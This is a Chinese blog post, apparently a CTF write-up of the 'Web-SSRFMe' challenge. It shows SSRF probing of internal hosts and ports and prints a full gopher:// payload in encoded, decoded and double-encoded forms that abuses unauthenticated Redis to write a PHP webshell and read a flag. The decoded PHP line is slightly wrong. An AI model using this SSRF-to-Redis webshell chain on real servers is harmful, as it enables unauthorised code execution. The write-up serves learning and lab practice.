Web-SSRFMe

最新推荐文章于 2024-10-02 15:25:16 发布
最新推荐文章于 2024-10-02 15:25:16 发布
阅读量322 收藏 2
点赞数 2
分类专栏: SSRF 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/141534389
版权

目录

Web-SSRFMe

分析代码

  1. 分析代码 ,代码尝试过滤某些恶意输入(如 file://、dict://、../、127.0.0.1localhost
    在这里插入图片描述

在这里插入图片描述

测试ssrf

  1. 接收url参数,测试访问外部 URL

在这里插入图片描述3. 传递参数info,会显示phpinfo()

在这里插入图片描述

扫描内网存活主机

  1. 发现内网主机IP

在这里插入图片描述
5. 测试相邻主机IP,172.19.0.2 有回显

在这里插入图片描述
6. 扫描端口

在这里插入图片描述7. 扫描到开放了 806379 端口

在这里插入图片描述8. 访问 6379 端口,出现redis报错,尝试redis未授权访问攻击

在这里插入图片描述

扫描网站可写入目录

  1. 扫描一下网站有哪些目录,并尝试写入
    在这里插入图片描述
    在这里插入图片描述
  2. 扫描到upload目录

在这里插入图片描述

生成payload

  1. 使用 gopherus 生成 payload
    在这里插入图片描述
gopher://172.19.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2436%0D%0A%0A%0A%3C%3Fphp%20systemctl%28%27cat%20/flag%27%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
  • URLcode转码,分析payload做了什么事
gopher://172.20.0.2:6379/_*1
$8
flushall
*3
$3
set
$1
1
$36


<?php systemctl('cat /flag'); ?>


*4
$6
config
$3
set
$3
dir
$20
/var/www/html/upload
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save
  • 二次编码
gopher%3a%2f%2f172.19.0.2%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520%2fflag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2fvar%2fwww%2fhtml%2fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

测试paylaod

  1. 测试payload,拿到flag
    在这里插入图片描述
CyberSecure
关注
专栏目录
Web-ssrfme
丁航航的博客
08-24 408
查看代码发现,如果传递参数info,那么会打印phpinfo(),尝试看看有没有有用的线索。但是查看代码发现,过滤了file、dict、localhost等。查看代码发现,存在url接收参数,传递参数尝试是否含有ssrf。访问内网的.2的6379端口,出现了redis的报错。那么尝试利用内网IP进行探测端口,这里使用burp。那么咱们尝试url为内网IP能不能有打印的东西。那么尝试扫描路径,尝试寻找权限低的文件插入。发现打印了两次,也就是读取了两次这个文件。从这里看,只开放了80端口,那没有什么用。
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1200
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾
山下南徒的博客
05-31 3328
CTF-2020网鼎杯-玄武祖-web题-ssrfme知识回顾 思路:SSRF结合redis主从复制RCE Tip:使用DNS重绑定绕过限制 参考笔记:redis 主服务器:192.168.8.103 从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙) 第一步:使用脚本redis-rogue-server伪装redis主服务器: python3 redis-rogue-server.py --server-only 第二步:
web-ssrfme
beizhibuhuiqiaod的博客
08-25 279
可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。
Web-ssrfme复现
m0_64238664的博客
08-25 590
但是查看代码发现,过滤了file、dict、localhost等,过滤dict是为了防止探测端口。这里看见了,打印了两次也就是读取了两次文件,我就可以尝试使用端口探测burp。可以看到6379的端口也开放着,访问一下出现redis的报错就可以攻击了。查看代码发现,存在url接收参数,传递参数尝试是否含有。可以尝试一下url能不能有打印的东西。除了80端口也就2.3有点可疑。通过docker拉取环境。,发现确实存在ssrf。要进行url编码在攻击。
一道ssrf题目--Web-ssrfme
banliyaoguai的博客
08-26 1727
我们可以传webshell到服务器上,但是这个需要我们知道物理路径,这道题目物理路径我们是不知道,需要我们猜测,我们尝试一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。现在我们怀疑是不是权限不够的原因,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们接着尝试,我们现在发现服务器的IP是172.21.0.3这个端口,这是在内网当中,在内网当中服务器可能会很多,并且服务器IP可能是连续的,我们可以尝试一下有没有别的服务器供我们入侵。
ssrf--web-ssrfme例题
m0_65350813的博客
08-24 240
给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。我们使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。
关于SSRF的相关案例(2月公开赛Web-ssrfme)
m0_52326740的博客
08-25 587
给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。当端口为6379的时候,没有任何区别。
web-ssrfme环境
08-25
使用docker-compose安装
Web-ssrfme docker包
08-24
Web-ssrfme docker包
网鼎杯网络安全大赛玄武组-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1578
网鼎杯网络安全大赛玄武组-SSRFME题 index.php可绕过本地条件判断,以下是源码:
网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 76
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 1173
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 1002
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 786
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 298
Windows注册表
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值